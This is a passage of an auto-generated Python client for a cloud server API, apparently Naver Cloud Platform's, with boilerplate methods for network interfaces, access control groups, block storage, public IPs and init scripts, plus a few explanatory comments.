raise ValueError("Missing the required parameter `add_network_interface_access_control_group_request` when calling `add_network_interface_access_control_group`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'add_network_interface_access_control_group_request' in params:
body_params = params['add_network_interface_access_control_group_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/addNetworkInterfaceAccessControlGroup', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AddNetworkInterfaceAccessControlGroupResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
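# --- `_with_http_info` return value (illustrative) ---------------------------
# The public wrapper above pins `_return_http_data_only=True`, so callers see
# only the response model. Calling the `_with_http_info` variant directly
# without that flag returns the richer tuple that swagger-codegen clients
# conventionally produce; a sketch, assuming `api_client.call_api` follows
# that convention:
#
#     data, status, headers = api.add_network_interface_access_control_group_with_http_info(
#         req, _return_http_data_only=False)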
def add_placement_group_server_instance(self, add_placement_group_server_instance_request, **kwargs): # noqa: E501
"""add_placement_group_server_instance # noqa: E501
Add a server instance to a physical placement group # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_placement_group_server_instance(add_placement_group_server_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param AddPlacementGroupServerInstanceRequest add_placement_group_server_instance_request: addPlacementGroupServerInstanceRequest (required)
:return: AddPlacementGroupServerInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.add_placement_group_server_instance_with_http_info(add_placement_group_server_instance_request, **kwargs) # noqa: E501
else:
(data) = self.add_placement_group_server_instance_with_http_info(add_placement_group_server_instance_request, **kwargs) # noqa: E501
return data
def add_placement_group_server_instance_with_http_info(self, add_placement_group_server_instance_request, **kwargs): # noqa: E501
"""add_placement_group_server_instance # noqa: E501
Add a server instance to a physical placement group # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_placement_group_server_instance_with_http_info(add_placement_group_server_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param AddPlacementGroupServerInstanceRequest add_placement_group_server_instance_request: addPlacementGroupServerInstanceRequest (required)
:return: AddPlacementGroupServerInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['add_placement_group_server_instance_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_placement_group_server_instance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'add_placement_group_server_instance_request' is set
if ('add_placement_group_server_instance_request' not in params or
params['add_placement_group_server_instance_request'] is None):
raise ValueError("Missing the required parameter `add_placement_group_server_instance_request` when calling `add_placement_group_server_instance`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'add_placement_group_server_instance_request' in params:
body_params = params['add_placement_group_server_instance_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/addPlacementGroupServerInstance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AddPlacementGroupServerInstanceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
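# --- Keyword validation (illustrative) ---------------------------------------
# Each `_with_http_info` method whitelists its keyword arguments through
# `all_params` and rejects anything else before touching the network, so
# typos fail fast. For example, with an `api` instance:
#
#     api.add_placement_group_server_instance(req, no_such_option=1)
#     # TypeError: Got an unexpected keyword argument 'no_such_option'
#     #            to method add_placement_group_server_instance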
def associate_public_ip_with_server_instance(self, associate_public_ip_with_server_instance_request, **kwargs): # noqa: E501
"""associate_public_ip_with_server_instance # noqa: E501
Associate a public IP with a server instance # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.associate_public_ip_with_server_instance(associate_public_ip_with_server_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param AssociatePublicIpWithServerInstanceRequest associate_public_ip_with_server_instance_request: associatePublicIpWithServerInstanceRequest (required)
:return: AssociatePublicIpWithServerInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.associate_public_ip_with_server_instance_with_http_info(associate_public_ip_with_server_instance_request, **kwargs) # noqa: E501
else:
(data) = self.associate_public_ip_with_server_instance_with_http_info(associate_public_ip_with_server_instance_request, **kwargs) # noqa: E501
return data
def associate_public_ip_with_server_instance_with_http_info(self, associate_public_ip_with_server_instance_request, **kwargs): # noqa: E501
"""associate_public_ip_with_server_instance # noqa: E501
Associate a public IP with a server instance # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.associate_public_ip_with_server_instance_with_http_info(associate_public_ip_with_server_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param AssociatePublicIpWithServerInstanceRequest associate_public_ip_with_server_instance_request: associatePublicIpWithServerInstanceRequest (required)
:return: AssociatePublicIpWithServerInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['associate_public_ip_with_server_instance_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method associate_public_ip_with_server_instance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'associate_public_ip_with_server_instance_request' is set
if ('associate_public_ip_with_server_instance_request' not in params or
params['associate_public_ip_with_server_instance_request'] is None):
raise ValueError("Missing the required parameter `associate_public_ip_with_server_instance_request` when calling `associate_public_ip_with_server_instance`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'associate_public_ip_with_server_instance_request' in params:
body_params = params['associate_public_ip_with_server_instance_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/associatePublicIpWithServerInstance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AssociatePublicIpWithServerInstanceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def attach_block_storage_instance(self, attach_block_storage_instance_request, **kwargs): # noqa: E501
"""attach_block_storage_instance # noqa: E501
Attach a block storage instance # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.attach_block_storage_instance(attach_block_storage_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param AttachBlockStorageInstanceRequest attach_block_storage_instance_request: attachBlockStorageInstanceRequest (required)
:return: AttachBlockStorageInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.attach_block_storage_instance_with_http_info(attach_block_storage_instance_request, **kwargs) # noqa: E501
else:
(data) = self.attach_block_storage_instance_with_http_info(attach_block_storage_instance_request, **kwargs) # noqa: E501
return data
def attach_block_storage_instance_with_http_info(self, attach_block_storage_instance_request, **kwargs): # noqa: E501
"""attach_block_storage_instance # noqa: E501
Attach a block storage instance # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.attach_block_storage_instance_with_http_info(attach_block_storage_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param AttachBlockStorageInstanceRequest attach_block_storage_instance_request: attachBlockStorageInstanceRequest (required)
:return: AttachBlockStorageInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['attach_block_storage_instance_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method attach_block_storage_instance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'attach_block_storage_instance_request' is set
if ('attach_block_storage_instance_request' not in params or
params['attach_block_storage_instance_request'] is None):
raise ValueError("Missing the required parameter `attach_block_storage_instance_request` when calling `attach_block_storage_instance`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'attach_block_storage_instance_request' in params:
body_params = params['attach_block_storage_instance_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/attachBlockStorageInstance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AttachBlockStorageInstanceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def attach_network_interface(self, attach_network_interface_request, **kwargs): # noqa: E501
"""attach_network_interface # noqa: E501
Attach a network interface # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.attach_network_interface(attach_network_interface_request, async=True)
>>> result = thread.get()
:param async bool
:param AttachNetworkInterfaceRequest attach_network_interface_request: attachNetworkInterfaceRequest (required)
:return: AttachNetworkInterfaceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.attach_network_interface_with_http_info(attach_network_interface_request, **kwargs) # noqa: E501
else:
(data) = self.attach_network_interface_with_http_info(attach_network_interface_request, **kwargs) # noqa: E501
return data
def attach_network_interface_with_http_info(self, attach_network_interface_request, **kwargs): # noqa: E501
"""attach_network_interface # noqa: E501
Attach a network interface # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.attach_network_interface_with_http_info(attach_network_interface_request, async=True)
>>> result = thread.get()
:param async bool
:param AttachNetworkInterfaceRequest attach_network_interface_request: attachNetworkInterfaceRequest (required)
:return: AttachNetworkInterfaceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['attach_network_interface_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method attach_network_interface" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'attach_network_interface_request' is set
if ('attach_network_interface_request' not in params or
params['attach_network_interface_request'] is None):
raise ValueError("Missing the required parameter `attach_network_interface_request` when calling `attach_network_interface`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'attach_network_interface_request' in params:
body_params = params['attach_network_interface_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/attachNetworkInterface', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AttachNetworkInterfaceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
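# --- Transport options (illustrative) ----------------------------------------
# `_preload_content` and `_request_timeout` are forwarded untouched to
# `api_client.call_api`. A sketch, assuming the urllib3-backed behaviour of
# swagger-codegen clients (raw response object when preloading is disabled,
# and either a single timeout or a (connect, read) pair):
#
#     raw = api.attach_network_interface(req, _preload_content=False)
#     payload = raw.data  # undecoded bytes; caller deserializes
#
#     resp = api.attach_network_interface(req, _request_timeout=(3.05, 27))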
def change_block_storage_volume_size(self, change_block_storage_volume_size_request, **kwargs): # noqa: E501
"""change_block_storage_volume_size # noqa: E501
Change the block storage volume size # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.change_block_storage_volume_size(change_block_storage_volume_size_request, async=True)
>>> result = thread.get()
:param async bool
:param ChangeBlockStorageVolumeSizeRequest change_block_storage_volume_size_request: changeBlockStorageVolumeSizeRequest (required)
:return: ChangeBlockStorageVolumeSizeResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.change_block_storage_volume_size_with_http_info(change_block_storage_volume_size_request, **kwargs) # noqa: E501
else:
(data) = self.change_block_storage_volume_size_with_http_info(change_block_storage_volume_size_request, **kwargs) # noqa: E501
return data
def change_block_storage_volume_size_with_http_info(self, change_block_storage_volume_size_request, **kwargs): # noqa: E501
"""change_block_storage_volume_size # noqa: E501
Change the block storage volume size # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.change_block_storage_volume_size_with_http_info(change_block_storage_volume_size_request, async=True)
>>> result = thread.get()
:param async bool
:param ChangeBlockStorageVolumeSizeRequest change_block_storage_volume_size_request: changeBlockStorageVolumeSizeRequest (required)
:return: ChangeBlockStorageVolumeSizeResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['change_block_storage_volume_size_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method change_block_storage_volume_size" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'change_block_storage_volume_size_request' is set
if ('change_block_storage_volume_size_request' not in params or
params['change_block_storage_volume_size_request'] is None):
raise ValueError("Missing the required parameter `change_block_storage_volume_size_request` when calling `change_block_storage_volume_size`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'change_block_storage_volume_size_request' in params:
body_params = params['change_block_storage_volume_size_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/changeBlockStorageVolumeSize', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ChangeBlockStorageVolumeSizeResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def change_server_instance_spec(self, change_server_instance_spec_request, **kwargs): # noqa: E501
"""change_server_instance_spec # noqa: E501
Change the server instance spec # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.change_server_instance_spec(change_server_instance_spec_request, async=True)
>>> result = thread.get()
:param async bool
:param ChangeServerInstanceSpecRequest change_server_instance_spec_request: changeServerInstanceSpecRequest (required)
:return: ChangeServerInstanceSpecResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.change_server_instance_spec_with_http_info(change_server_instance_spec_request, **kwargs) # noqa: E501
else:
(data) = self.change_server_instance_spec_with_http_info(change_server_instance_spec_request, **kwargs) # noqa: E501
return data
def change_server_instance_spec_with_http_info(self, change_server_instance_spec_request, **kwargs): # noqa: E501
"""change_server_instance_spec # noqa: E501
Change the server instance spec # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.change_server_instance_spec_with_http_info(change_server_instance_spec_request, async=True)
>>> result = thread.get()
:param async bool
:param ChangeServerInstanceSpecRequest change_server_instance_spec_request: changeServerInstanceSpecRequest (required)
:return: ChangeServerInstanceSpecResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['change_server_instance_spec_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method change_server_instance_spec" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'change_server_instance_spec_request' is set
if ('change_server_instance_spec_request' not in params or
params['change_server_instance_spec_request'] is None):
raise ValueError("Missing the required parameter `change_server_instance_spec_request` when calling `change_server_instance_spec`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'change_server_instance_spec_request' in params:
body_params = params['change_server_instance_spec_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/changeServerInstanceSpec', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ChangeServerInstanceSpecResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_access_control_group(self, create_access_control_group_request, **kwargs): # noqa: E501
"""create_access_control_group # noqa: E501
Create an ACG # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_access_control_group(create_access_control_group_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateAccessControlGroupRequest create_access_control_group_request: createAccessControlGroupRequest (required)
:return: CreateAccessControlGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_access_control_group_with_http_info(create_access_control_group_request, **kwargs) # noqa: E501
else:
(data) = self.create_access_control_group_with_http_info(create_access_control_group_request, **kwargs) # noqa: E501
return data
def create_access_control_group_with_http_info(self, create_access_control_group_request, **kwargs): # noqa: E501
"""create_access_control_group # noqa: E501
Create an ACG # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_access_control_group_with_http_info(create_access_control_group_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateAccessControlGroupRequest create_access_control_group_request: createAccessControlGroupRequest (required)
:return: CreateAccessControlGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_access_control_group_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_access_control_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_access_control_group_request' is set
if ('create_access_control_group_request' not in params or
params['create_access_control_group_request'] is None):
raise ValueError("Missing the required parameter `create_access_control_group_request` when calling `create_access_control_group`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_access_control_group_request' in params:
body_params = params['create_access_control_group_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/createAccessControlGroup', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateAccessControlGroupResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_block_storage_instance(self, create_block_storage_instance_request, **kwargs): # noqa: E501
"""create_block_storage_instance # noqa: E501
Create a block storage instance # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_block_storage_instance(create_block_storage_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateBlockStorageInstanceRequest create_block_storage_instance_request: createBlockStorageInstanceRequest (required)
:return: CreateBlockStorageInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_block_storage_instance_with_http_info(create_block_storage_instance_request, **kwargs) # noqa: E501
else:
(data) = self.create_block_storage_instance_with_http_info(create_block_storage_instance_request, **kwargs) # noqa: E501
return data
def create_block_storage_instance_with_http_info(self, create_block_storage_instance_request, **kwargs): # noqa: E501
"""create_block_storage_instance # noqa: E501
Create a block storage instance # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_block_storage_instance_with_http_info(create_block_storage_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateBlockStorageInstanceRequest create_block_storage_instance_request: createBlockStorageInstanceRequest (required)
:return: CreateBlockStorageInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_block_storage_instance_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_block_storage_instance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_block_storage_instance_request' is set
if ('create_block_storage_instance_request' not in params or
params['create_block_storage_instance_request'] is None):
raise ValueError("Missing the required parameter `create_block_storage_instance_request` when calling `create_block_storage_instance`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_block_storage_instance_request' in params:
body_params = params['create_block_storage_instance_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/createBlockStorageInstance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateBlockStorageInstanceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_block_storage_snapshot_instance(self, create_block_storage_snapshot_instance_request, **kwargs): # noqa: E501
"""create_block_storage_snapshot_instance # noqa: E501
Create a block storage snapshot instance # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_block_storage_snapshot_instance(create_block_storage_snapshot_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateBlockStorageSnapshotInstanceRequest create_block_storage_snapshot_instance_request: createBlockStorageSnapshotInstanceRequest (required)
:return: CreateBlockStorageSnapshotInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_block_storage_snapshot_instance_with_http_info(create_block_storage_snapshot_instance_request, **kwargs) # noqa: E501
else:
(data) = self.create_block_storage_snapshot_instance_with_http_info(create_block_storage_snapshot_instance_request, **kwargs) # noqa: E501
return data
def create_block_storage_snapshot_instance_with_http_info(self, create_block_storage_snapshot_instance_request, **kwargs): # noqa: E501
"""create_block_storage_snapshot_instance # noqa: E501
Create a block storage snapshot instance # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_block_storage_snapshot_instance_with_http_info(create_block_storage_snapshot_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateBlockStorageSnapshotInstanceRequest create_block_storage_snapshot_instance_request: createBlockStorageSnapshotInstanceRequest (required)
:return: CreateBlockStorageSnapshotInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_block_storage_snapshot_instance_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_block_storage_snapshot_instance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_block_storage_snapshot_instance_request' is set
if ('create_block_storage_snapshot_instance_request' not in params or
params['create_block_storage_snapshot_instance_request'] is None):
raise ValueError("Missing the required parameter `create_block_storage_snapshot_instance_request` when calling `create_block_storage_snapshot_instance`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_block_storage_snapshot_instance_request' in params:
body_params = params['create_block_storage_snapshot_instance_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/createBlockStorageSnapshotInstance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateBlockStorageSnapshotInstanceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
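# --- Response format pinning (for reference) ---------------------------------
# Every operation appends `responseFormatType=json` to the query string, so
# the deserializer can rely on JSON regardless of account defaults. The call
# above therefore issues:
#
#     POST /createBlockStorageSnapshotInstance?responseFormatType=json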
def create_init_script(self, create_init_script_request, **kwargs): # noqa: E501
"""create_init_script # noqa: E501
Create an init script # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_init_script(create_init_script_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateInitScriptRequest create_init_script_request: createInitScriptRequest (required)
:return: CreateInitScriptResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_init_script_with_http_info(create_init_script_request, **kwargs) # noqa: E501
else:
(data) = self.create_init_script_with_http_info(create_init_script_request, **kwargs) # noqa: E501
return data
def create_init_script_with_http_info(self, create_init_script_request, **kwargs): # noqa: E501
"""create_init_script # noqa: E501
Create an init script # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_init_script_with_http_info(create_init_script_request, async=True)
>>> result = thread.get()
:param async bool
:param CreateInitScriptRequest create_init_script_request: createInitScriptRequest (required)
:return: CreateInitScriptResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['create_init_script_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_init_script" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'create_init_script_request' is set
if ('create_init_script_request' not in params or
params['create_init_script_request'] is None):
raise ValueError("Missing the required parameter `create_init_script_request` when calling `create_init_script`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_init_script_request' in params:
body_params = params['create_init_script_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/createInitScript', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateInitScriptResponse', # noqa: E501
auth_settings=auth_settings,
